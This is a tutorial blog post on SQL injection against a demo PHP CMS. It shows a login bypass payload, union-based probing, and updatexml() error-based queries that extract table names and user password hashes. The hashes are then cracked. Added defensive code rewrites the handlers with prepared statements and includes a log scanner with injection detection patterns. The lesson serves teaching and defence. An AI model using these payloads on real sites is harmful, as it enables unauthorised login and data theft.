SQL injection cases and principles

Foreword

This post walks through a few SQL injection cases and the principles behind them.

1. What is SQL injection?

SQL injection occurs when a web application does not check the legality of user-supplied data, or does not filter it strictly enough. An attacker can then append extra SQL to the query statements the application has pre-defined, without the administrator's knowledge, and perform illegal operations under certain conditions: the database server is deceived into executing unauthorized arbitrary queries, which can further expose the corresponding data.

2. Log in to the web management system through a universal username

Universal usernames

The two strings below are so-called universal usernames. The actual operation is carried out below.

  1. aaa' or 1=1 #

  2. aaa' or 1'='1

First open the background management page of the demo website; a login interface appears.
Enter a username and password to log in: username `admin`, password `password`.
The login fails.

Capturing the request with Burp Suite (bp) shows that the login is a POST request containing the username and password we just entered, and that the response status is 200.
Now log in with the universal username: username `aaa' or 1=1 #`, password `1`.

The login succeeds, and the logged-in user name is the universal username we just entered.
Looking at the POST request in Burp, the special characters in the username have been URL-encoded: `'` becomes `%27`, a space becomes `+`, `=` becomes `%3D`, and `#` becomes `%23`. In the response echo the password has been converted to its MD5 hash.

From this we can infer that there is a problem in this page's source code.

Analysis

The source file is as follows:

```php
<?php
session_start();
header('Content-Type: text/html; charset=utf-8');
include_once("../include/config.inc.php");
if (isset($_POST["username"])) {
    $username = $_POST["username"];
} else {
    $username = "";
}
if (isset($_POST["password"])) {
    $password = $_POST["password"];
} else {
    $password = "";
}
// Remember the account name
setcookie('username', $username, time() + 3600*24*365);
if (empty($username) || empty($password)) {
    exit("<script>alert('Username or password cannot be empty!');window.history.go(-1)</script>");
}
// Vulnerable: $username is concatenated straight into the SQL text
$user_row = $db->getOneRow("select userid from cms_users where username = '".$username."' and password='".md5($password)."'");
// This echo prints the query as sent, which is why the MD5 password shows up in the response
echo "select userid from cms_users where username = '".$username."' and password='".md5($password)."'";
if (!empty($user_row)) {
    setcookie('userid', $user_row['userid']);
    header("Location: index.php");
} else {
    //echo "select userid from cms_users where username = '".$username."' and password='".md5($password)."'";
    exit("<script>alert('The username or password is incorrect!');window.history.go(-1)</script>");
}
?>
```

```php
$user_row = $db->getOneRow("select userid from cms_users where username = '".$username."' and password='".md5($password)."'");
```

This line contains the SQL statement. The login check runs a select against the users table of the cms database to determine whether the user exists.

Substituting the universal username gives:

```php
$user_row = $db->getOneRow("select userid from cms_users where username = 'aaa' or 1=1 #".$username."' and password='".md5($password)."'");
```

This splits into two parts:

```
1. $user_row = $db->getOneRow("select userid from cms_users where username = 'aaa' or 1=1 #
2. ".$username."' and password='".md5($password)."'");
```

The second part is turned into a comment by `#`. The first part relies on the `or` operator: if either side is true the whole condition is true, and `1=1` is always true, so the condition always holds. Everything after `#` is comment content and is ignored.
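For contrast, here is the same login handler written so that user input never becomes part of the SQL text. This is an added example, not the CMS's own code. It assumes that `config.inc.php` provides `$db` as a PDO connection (opened with `PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION` and `PDO::ATTR_EMULATE_PREPARES => false`) and that the `cms_users.password` column is wide enough to hold `password_hash()` output; the `getOneRow()` helper is replaced by PDO calls.

```php
<?php
// Added example, not the CMS's own code: the login handler rewritten with a
// prepared statement and password_hash()/password_verify().
// Assumptions: $db is a PDO connection from config.inc.php and
// cms_users.password is VARCHAR(255) so it can hold password_hash() output.
session_start();
header('Content-Type: text/html; charset=utf-8');
include_once '../include/config.inc.php';

function login(PDO $db, string $username, string $password): ?int
{
    if ($username === '' || $password === '') {
        return null;
    }
    // The original statement was built by concatenation:
    //   "select userid from cms_users where username = '".$username."' and password='".md5($password)."'"
    // so the username aaa' or 1=1 # closed the quote, added an always-true
    // condition and commented out the password check. With a placeholder the
    // value is sent to MySQL separately from the statement text, and the quote,
    // "or 1=1" and "#" are just characters of a username that does not exist.
    $stmt = $db->prepare('SELECT userid, password FROM cms_users WHERE username = ? LIMIT 1');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;
    }
    // The post recovered admin's password from its unsalted MD5 in seconds.
    // password_hash() stores a salted, slow hash; password_verify() checks it.
    if (!password_verify($password, $row['password'])) {
        return null;
    }
    // Upgrade the stored hash when the default algorithm or cost has changed.
    if (password_needs_rehash($row['password'], PASSWORD_DEFAULT)) {
        $upd = $db->prepare('UPDATE cms_users SET password = ? WHERE userid = ?');
        $upd->execute([password_hash($password, PASSWORD_DEFAULT), $row['userid']]);
    }
    return (int) $row['userid'];
}

$username = $_POST['username'] ?? '';
$password = $_POST['password'] ?? '';
if ($username === '' || $password === '') {
    exit("<script>alert('Username or password cannot be empty!');window.history.go(-1)</script>");
}

$userid = login($db, $username, $password);
if ($userid === null) {
    // Same message for unknown user and wrong password, and never echo the SQL.
    exit("<script>alert('The username or password is incorrect!');window.history.go(-1)</script>");
}

// Keep the identity server-side: the original setcookie('userid', ...) let the
// browser present any userid it liked.
session_regenerate_id(true);
$_SESSION['userid'] = $userid;
header('Location: index.php');
exit;
```

With `ATTR_EMULATE_PREPARES` off, MySQL itself receives the statement and the parameter as two separate messages, so no amount of quoting or `#` in the value can change the statement's shape; the `LIMIT 1` and the single generic error message are there so that the response does not reveal whether a username exists.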

3. Union query

Open the site and click on an article; the URL contains `?id=33`. Change 33 to 34.

The page content changes after `?id=33` becomes `?id=34`. Now append `'` after `?id=34` and see what changes.

The tool used here is HackBar. The page now shows an error; let's analyze the error message:

```
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
```

The key part is `near '''`. One of the `'` is what we entered. The underlying statement should be something like `select FUZZ from FUZZ where id=34`; the extra `'` we added breaks the syntax, hence the error. It also shows that `id` is handled as a numeric type, not a string.
Append `and 1=1` after `id=34` and the page displays normally again.
Determine the number of columns with `order by`.
`order by 100` shows that there are not 100 columns; continue with binary search and find that there are 15 columns.
Use a union query to determine which columns are displayed: `union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15`.
Nothing changes at first, because `id=34` must be made false so that the union row is the one displayed; change it to `id=-34`.
Now positions 3 and 11 are echoed on the page. Replace 3 with `version()` and 11 with `database()` and look at the result:
position 3 now shows the database version and position 11 the name of the database.
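As an added example (not the CMS's own code), here is how the article page could handle `?id=` so that neither the `34'` probe nor `-34 union select ...` reaches MySQL, and so that MySQL's error text is never echoed back to the browser. The table `cms_articles` and its columns are placeholders, and `$db` is assumed to be a PDO connection from `config.inc.php` opened with `PDO::ERRMODE_EXCEPTION`.

```php
<?php
// Added example, not the CMS's own code: fetching an article by the numeric
// ?id= parameter from the post. Assumptions: $db is a PDO connection from
// config.inc.php and cms_articles(id, title, body) is a placeholder table.
include_once '../include/config.inc.php';
ini_set('display_errors', '0');   // in production, PHP/MySQL errors go to the log, not the page

function fetchArticle(PDO $db, $rawId): ?array
{
    // The post established that id is numeric: "34'" produced a MySQL syntax
    // error and "-34 union select 1,...,15" swapped the displayed row.
    // Validate as a positive integer first; "34'", "34 and 1=1", "34 order by 100"
    // and "-34 union select ..." are all rejected before touching the database.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, title, body FROM cms_articles WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);   // bound as an integer, never spliced into the SQL text
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

try {
    $article = fetchArticle($db, $_GET['id'] ?? '');
} catch (PDOException $e) {
    // Both the union probing above and the updatexml() trick in the next
    // section depend on the server echoing MySQL's error message. Log it
    // server-side and show the user a generic page instead.
    error_log('article query failed: ' . $e->getMessage());
    http_response_code(500);
    exit('An error occurred.');
}
if ($article === null) {
    http_response_code(404);
    exit('Article not found.');
}
echo '<h1>' . htmlspecialchars($article['title'], ENT_QUOTES, 'UTF-8') . '</h1>';
echo '<div>' . htmlspecialchars($article['body'], ENT_QUOTES, 'UTF-8') . '</div>';
```

The integer check and `PDO::PARAM_INT` each close the hole on their own; keeping both means a later change to one of them does not silently reopen it. Catching `PDOException` matters as much as the binding: the `order by 100` step in the post only worked because the page told the attacker when the query broke.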

4. Obtain the background administrator account password

There are four methods; Boolean blind injection and time-based (delayed) injection are very costly and should be used with caution.

1. Union query

First query all table names in the cms library.
Here `count(*)` gives the number of tables and `hex(group_concat(table_name))` lists the table names, which can be decoded with the Decoder in Burp. `information_schema.tables where table_schema=database()` restricts the query to the current library.
Querying the cms_users table shows that there are two users; the first user is displayed here.
Use `limit 1,1` to query the second user.

2. Error-based injection

First query the library name:

```sql
updatexml(1,concat(0x5e,(select database()),0x5e),1)
```

Query the number of tables in the cms database:

```sql
id=34 and updatexml(1,concat(0x5e,(select count(*) from information_schema.tables where table_schema=database()),0x5e),1)
```

Get the table names one by one:

```sql
updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x5e),1)
```

The eighth table is cms_users.
Query the number of columns in cms_users. `0x636d735f7573657273` is the hexadecimal encoding of `cms_users`:

```sql
updatexml(1,concat(0x5e,(select count(*) from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273),0x5e),1)
```

Query each column name:

```sql
updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_schema=database() and table_name=0x636d735f7573657273 limit 0,1),0x5e),1)
```

The columns are userid, username and password. userid is of little use; the focus is on username and password.

```sql
-- Query the first username in cms_users
updatexml(1,concat(0x5e,(select username from cms_users limit 0,1),0x5e),1)
```

The second username is obtained the same way. The password of admin is [e10adc3949ba59abbe56e057f20f883e](https://www.somd5.com/), which is the MD5 of 123456.

```sql
updatexml(1,concat(0x5e,(select substr(password,1,16) from cms_users limit 0,1),0x5e),1)
updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users limit 0,1),0x5e),1)
-- The password is a 32-character MD5 hash, so it is read in two halves.
```


The password of ajest is obtained the same way: cbff36039c3d0212b3e34c23dcde1456, which is 123.com.
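From the defender's side, the requests in sections 3 and 4 leave a recognisable trail in the web server's access log. The following is an added example, not from the post, of a small PHP scanner for exactly those patterns. The log lines are constructed for the example, the path `/show.php` is a placeholder, and the patterns cover only what this post shows, so this is a triage aid rather than a complete WAF.

```php
<?php
// Added example, not from the post: flag the injection patterns seen in this
// post (quote + or 1=1 #, order by probing, union select, information_schema
// enumeration, updatexml() error-based extraction) in access-log lines.

const SQLI_PATTERNS = [
    'comment_truncation' => "/'\\s*or\\s+1\\s*=\\s*1\\s*#/i",
    'order_by_probe'     => '/\border\s+by\s+\d+/i',
    'union_select'       => '/\bunion\s+(all\s+)?select\b/i',
    'schema_enum'        => '/information_schema\.(tables|columns)/i',
    'error_based'        => '/\bupdatexml\s*\(/i',
];

function decodeRequestTarget(string $target): string
{
    // Burp showed the browser sending ' as %27, space as +, = as %3D and # as %23;
    // urldecode() reverses that form encoding. Decoding twice also catches
    // double-encoded payloads (%2527 -> %27 -> ').
    return urldecode(urldecode($target));
}

function scanLogLine(string $line): array
{
    // Common Log Format request field: "METHOD /path?query HTTP/x.y"
    if (!preg_match('/"(?:GET|POST)\s+(\S+)\s+HTTP\/[\d.]+"/', $line, $m)) {
        return [];
    }
    $decoded = decodeRequestTarget($m[1]);
    $hits = [];
    foreach (SQLI_PATTERNS as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

// Constructed sample lines modelled on the requests in the post.
$sample = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /show.php?id=33 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2024:10:00:07 +0000] "GET /show.php?id=34%27 HTTP/1.1" 200 310',
    '203.0.113.5 - - [01/Jan/2024:10:00:15 +0000] "GET /show.php?id=34+order+by+100 HTTP/1.1" 200 310',
    '203.0.113.5 - - [01/Jan/2024:10:00:30 +0000] "GET /show.php?id=-34+union+select+1,2,version(),4,5,6,7,8,9,10,database(),12,13,14,15 HTTP/1.1" 200 5200',
    '203.0.113.5 - - [01/Jan/2024:10:01:02 +0000] "GET /show.php?id=34+and+updatexml(1,concat(0x5e,(select+database()),0x5e),1) HTTP/1.1" 200 320',
    '203.0.113.5 - - [01/Jan/2024:10:01:40 +0000] "GET /show.php?id=34+and+updatexml(1,concat(0x5e,(select+count(*)+from+information_schema.tables+where+table_schema%3Ddatabase()),0x5e),1) HTTP/1.1" 200 320',
];

foreach ($sample as $line) {
    $hits = scanLogLine($line);
    printf("%-6s %s\n", $hits ? 'ALERT' : 'ok', $hits ? implode(',', $hits) : substr($line, 46, 40));
}
```

Two gaps are worth knowing about. The lone `34'` probe in the second line is not matched, because a single quote on its own is too noisy to alert on; the reliable signal for that step is the MySQL syntax error in the application's own log. And the login bypass from section 2 travels in a POST body, which the access log does not record, so the `comment_truncation` pattern only fires if the application logs its form input (with the password field redacted).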
I can't stand it anymore; I'll talk about Boolean blind injection and time-based injection later.